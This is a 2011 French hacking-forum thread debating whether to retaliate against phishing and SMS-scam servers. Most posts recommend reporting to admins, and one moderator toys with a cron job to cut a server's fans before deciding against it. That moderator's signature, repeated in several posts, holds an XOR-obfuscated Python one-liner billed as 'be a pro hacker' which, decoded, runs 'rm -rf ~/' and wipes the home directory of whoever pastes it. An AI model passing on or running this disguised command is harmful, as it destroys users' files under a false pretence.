Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 05-11-2011 15:04:58

spawn
Modérateur

Est-il moral de s'attaquer aux phishers ?

Par exemple, en leur cramant leurs seveurs ? big_smile

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 05-11-2011 15:51:02

M1ck3y
Administrateur
Lieu : Lost in the darkness

Re : Est-il moral de s'attaquer aux phishers ?

La plupart du temps les pages de phishing sont hébergées dans un recoin sur un site ou serveur hacké, à l'insu de l'admin. Le mieux est encore de le signaler à l'admin du site ou du serveur en question.

Si tu veux devenir le justicier du phishing tu vas avoir du taf 24h/24, c'est comme les scammers ça n'arrette jamais tongue

#3 05-11-2011 15:55:39

algerino
Membre d'Or

Par exemple, en leur cramant leurs seveurs ?

lol Comment tu voudrai détruire le serveur qui héberge les pages de phishing? Peux tu nous donner un exemple tongue

Dernière modification par algerino (05-11-2011 15:56:42)

Le silence est une sagesse mais rare sont ceux qui le pratiquent by Prophète Mohammed (saws)

#4 05-11-2011 17:11:37

goliate
Membre Irremplaçable
Site Web

Ou alors se que tu peut faire (c'est se que je fait) et tu verras se marrant, tu rentre n'importe quoi dans la page de phishing, le mec tout content croira récupérer tes ID, alors tu lui marque des petite phrase, du genre " je t'ai griller, je t'es bien eu etc...."

só deus podem me julgar
719895banniere3.gif
só deus podem me julgar

#5 05-11-2011 17:23:44

koala
Membre d'honneur
Lieu : In the sky

Ou alors se que tu peut faire (c'est se que je fait) et tu verras se marrant, tu rentre n'importe quoi dans la page de phishing, le mec tout content croira récupérer tes ID, alors tu lui marque des petite phrase, du genre " je t'ai griller, je t'es bien eu etc...."

J'avoue c'est le genre de truc que j'ai fais il y a pas longtemps avec un phishing sur yahooo<< ...non le dernier O est très important c'est ce qui ma sauté a l'oeil tongue

#6 05-11-2011 17:41:41

goliate
Membre Irremplaçable
Site Web

J'avoue que yahoo avec un 3eme o autant l'écrire yahoo0.
0k je s0rt ><

só deus podem me julgar
719895banniere3.gif
só deus podem me julgar

#7 05-11-2011 20:37:23

spawn
Modérateur

consultsm.com

oui il manque un s pour faire consultsms.com
ils t'envoient un sms à partir d'un numéro de portable bidon te disant d'aller EN WAP (-> laule) vers un lien
http://consultsm.com/xxxxx (cinq caractères alphanum)
(je ne met pas les miens en public, on ne sait jamais. mais sur les sites d'arnaque, tout le monde a la même page avec 3 vidéos à voir)

c'est l'arnaque à 4.5€ le sms.

J'ai recu un tweet que je ne sais pas lire :   (il semblerait que ce soit un robot qui traque le mot 'marocain' au vu de la TL et de sa présentation)

@punjog :اللي قال العرس ساهل، يسقي لو غير ماه
6 hours ago via Mi7lima

Quelqu'un peut me le traduire ?

(et quand on clique sur le lien, on est redirigé vers : "sms:81148?body=LIRE2"
je pense que depuis un téléphone qui supporte le WAP (re-laule) ça doit préparer l'envoi de sms
et donc le pompage de 4.5€ de crédit)

@algerino : en arrêtant les ventilateurs du serveur par exemple wink

Dernière modification par spawn (05-11-2011 20:47:49)

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

#8 05-11-2011 20:44:46

koala
Membre d'honneur

Ça serait moi, si l'arnaque est vraiment abusé ou méchante je n'hésiterai pas une seconde a leur foutre en l'air leur site.

#9 05-11-2011 21:00:59

spawn
Modérateur

Non, ça c'est pour la SNCF big_smile

Ici pour se faire avoir, il faut un peu de maladresse.

(traduction de google : "Qui a dit que le Sahel de mariage, si l'arrosage est Mah" merci google ! )

Dernière modification par spawn (05-11-2011 21:12:21)

@9b0ae3c4 méric.fr

#10 05-11-2011 21:25:10

koala
Membre d'honneur

Je pense qu'utiliser le pentest pour punir des gens peu scrupuleux et censé enfin c'est mon avis wink

#11 05-11-2011 21:47:13

toto
Membre V.I.P.
Lieu : chez le docteur aussi

juge et bourreau koala c'est délicat ce sujet ...

Si demain je viens te voir en te disant un tel a fait ceci et il est proprio de cette arnaque tu vas prendre ton gun (métasploit) pour l'abattre ???

mouais je n'adhère pas enfin surtout pour les dénonciations après si tu arrive a avoir l'identité de l'arnaqueur par tes propres moyens ok mais être un fantôme sur le net n'est pas difficile malheureusement

#12 05-11-2011 21:52:00

koala
Membre d'honneur

Si demain je viens te voir en te disant un tel a fait ceci et il est proprio de cette arnaque tu vas prendre ton gun (métasploit) pour l'abattre ???

Non commum pas big_smile mais le souci des arnaques par le net c'est que généralement on ne retrouve jamais les voleurs...et la justice se fou d'une petite arnaque a 4,5 euro pour suivre l'exemple, le problème c'est que cette arnaque est éffectuer sur des centaines de personnes, donc au final les arnaqueurs sont toujours gagnants... c'est ça qui me dérange dans cette histoire.

#13 05-11-2011 21:56:20

Fuji
Membre Irremplaçable
Lieu : Saint Script-sur-Shell

("اللي قال العرس ساهل، يسقي لو غير ماه") <==> (" Celui qui dit que le mariage était une chose facile, et bien il l'arrose avec de l'eau. ")  Je pense que ça peut se traduire que la vie d'un couple c'est comme une plante ou un arbre qu'il faut l'arroser pour grandir roll

#14 05-11-2011 21:59:46

toto
Membre V.I.P.

il faut sécuriser les systèmes et les protocoles aujourd'hui si je voulais monter une arnaque a grande échelle rien ne pourrais m'en empêcher c'est comme ça il faut prendre les problèmes de façon objective mais je suis sûr que tu l'est plus que moi (objectif) smile la sécurité est toujours a la traine c'est le problème majeure d'internet alors que l'on devrais inverser ceci la sécurité d abord les profits après ...

#15 05-11-2011 22:03:23

koala
Membre d'honneur

la sécurité est toujours a la traine c'est le problème majeure d'internet alors que l'on devrais inverser ceci la sécurité d abord les profits après ...

oui mais vu comment le monde évolue c'est pas gagné hmm je pense aussi que les admin ne sont pas assez informé des risques.

#16 05-11-2011 22:11:07

toto
Membre V.I.P.

c'est pour ça que je trouve ambigu tes propos ..

la seule chose qui pourrais faire de moi que l'on me mette la main dessus si j'étais un voleur c'est mon train de vie par rapport a mes revenues

Je pourrais me payer une belle bagnole plutôt que de prendre le car pour aller bosser un petit voyage en malaisie ou autre et un compte offshore je rentre et je joue au pmu tous les jours et je suis chanceux lol

l'est pas belle la vie wink

#17 05-11-2011 22:19:12

koala
Membre d'honneur

je rentre et je joue au pmu tous les jours et je suis chanceux lol

Partage ta chance mon cher big_smile

#18 05-11-2011 22:26:54

toto
Membre V.I.P.

ma chance c'est d'être en bonne santé de vivre dans un beau pays d'avoir un job qui me nourris et du temps pour aider mon prochain par le biais de mes connaissances je suis en train de voir pour aider les restos du cœur en récupérant du matos pour leurs offrir des bécanes et mon temps libre pour former les maraudes a récupérer leurs itinéraires sur un serveur, automatiser le plus, pour moins de bénévole, ou les libérer de certaines tache pour leurs faciliter la vie !!!

Dernière modification par toto (05-11-2011 22:31:26)

#19 05-11-2011 22:27:58

spawn
Modérateur

J'ai son nom, son prénom, sa date de naissance, son adresse, la marque de son pc.

Mais la délation, c'est pas non plus mon truc.

Non, finalement je pense que je ne vais rien faire. Ca ne rime pas à grand chose.

@9b0ae3c4 méric.fr

#20 05-11-2011 22:28:33

antares145
Membre d'honneur
Site Web

koala a écrit :

Je pense qu'utiliser le pentest pour punir des gens peu scrupuleux et censé enfin c'est mon avis wink

D'accord avec toi, mais t'attaquer au serveur qu'il utilise n'est pas la bonne approche... Comme l'a signalé M1ck3y, 9 fois sur 10 ils s'incrustent sur un serveur qu'ils ont réussi à infiltrer, parfois c'est même la machine d'un particulier. Donc ce n'est pas punir le phisher/scammer/whatever que de déplomber son serveur, au contraire, ça le fera juste rigoler (contrairement au véritable propriétaire de la machine). Si tu en as l'occasion, contente-toi de frappes chirurgicales en effaçant juste l'infrastructure du parasite sans toucher à la partie saine. Mais même là c'est tendu, parce que si tu te fais choper c'est toi qui ramasse en tant qu'attaquant hmm

toto a écrit :

la sécurité est toujours a la traine c'est le problème majeure d'internet alors que l'on devrais inverser ceci la sécurité d abord les profits après ...

Les profits après ?! Tu rêves là big_smile En fait le problème ici est double :
- les admins ont de moins en moins de temps pour gérer de plus en plus de trucs. On les paie 3 jours pour un truc qui se déploie en 1 semaine, donc ils font un peu ce qu'ils peuvent. Et la maintenance à long-terme et le suivi de sécurité c'est touuuuut en bas de leur (longue) liste de priorités.
- Internet, à la base, n'a pas été développé dans un modèle de réseau hostile. Au départ il reliait juste les universités, les quelques machines qui composaient le réseau pouvaient toutes être considérées comme "hôte de confiance" à priori, donc les protocoles de base (DNS, BGP, ARP, ...) n'avaient pas besoin de sécurité. Là maintenant tout a changé, mais les protocoles de base sont devenus tellement critiques qu'on ne peut pas en changer (ou plus exactement ça coûterait trop cher et ça ne rapporterait rien) hmm

#21 05-11-2011 22:39:17

koala
Membre d'honneur

Donc ce n'est pas punir le phisher/scammer/whatever que de déplomber son serveur, au contraire, ça le fera juste rigoler (contrairement au véritable propriétaire de la machine). Si tu en as l'occasion, contente-toi de frappes chirurgicales en effaçant juste l'infrastructure du parasite sans toucher à la partie saine. Mais même là c'est tendu, parce que si tu te fais choper c'est toi qui ramasse en tant qu'attaquant

En effet, c'est pas évident tout ça, prévenir l'admin c'est le mieux comme a dit M1ck3y mais il y en a qui n'ont toujours rien changer a leur site, j'en fais l'expérience en dévoilant une faille, et aujourd'hui elle y est toujours... peut-etre que le manque de temps et la surchage de taf est la cause comme tu le souligne smile

#22 05-11-2011 22:47:24

spawn
Modérateur

C'est lui et sa petite équipe de gens avec des fausses addresses à paris les propriétaires du serveur où il n'y a que le site qui tourne.

Mais comme j'ai du taf et que cela ne règlera en RIEN le problème, je ne vais rien faire.

D'accord avec vos avis sur la sécu et les admins.

@9b0ae3c4 méric.fr

#23 05-11-2011 22:52:15

toto
Membre V.I.P.

antares145 a écrit :

Mais même là c'est tendu, parce que si tu te fais choper c'est toi qui ramasse en tant qu'attaquant hmm

c'est pour ça que je reviens a des choses plus terre a terre j'ai vécu cette situation "dénoncé" sans preuve juste par mon intérêt au pentest 

ne vous prenez pas pour des justicier la vie m'en a donner la leçon laisser faire ceux qui sont habilité a cette tache ...

prévenir les admins c'est tous ce que nous pouvons faire a notre niveau ... malheureusement moi aussi j'aimerai pouvoir faire plus mais on deviens nous même hors la loi

Dernière modification par toto (05-11-2011 23:02:12)

#24 05-11-2011 22:57:02

koala
Membre d'honneur

C'est lui et sa petite équipe de gens avec des fausses addresses à paris les propriétaires du serveur où il n'y a que le site qui tourne.

C'est la ou on devine les bon des mauvais "hackeur" faire une arnaque est toujours mal mais je parle au niveau technique la, le but d'un hacker n'est-il pas de passer inaperçu? en s'infiltrant sur un serveur ça demande plus de technique que d'en créer un, sans compter que c'est pas franchement discret.

#25 05-11-2011 23:41:54

spawn
Modérateur

bon, j'ai résisté à l'appel de la cron table qui coupe les ventilateurs de 2h à 4h du mat toutes les nuits.
(le bâtiment est manifestement en ville, donc bon..)
(et aussi parce que il me semble que c'est un serveur virtualisé dans un plus gros partagé, avec des gens peut-être honnètes.)

Sur ce, dodo !

@9b0ae3c4 méric.fr

Annonce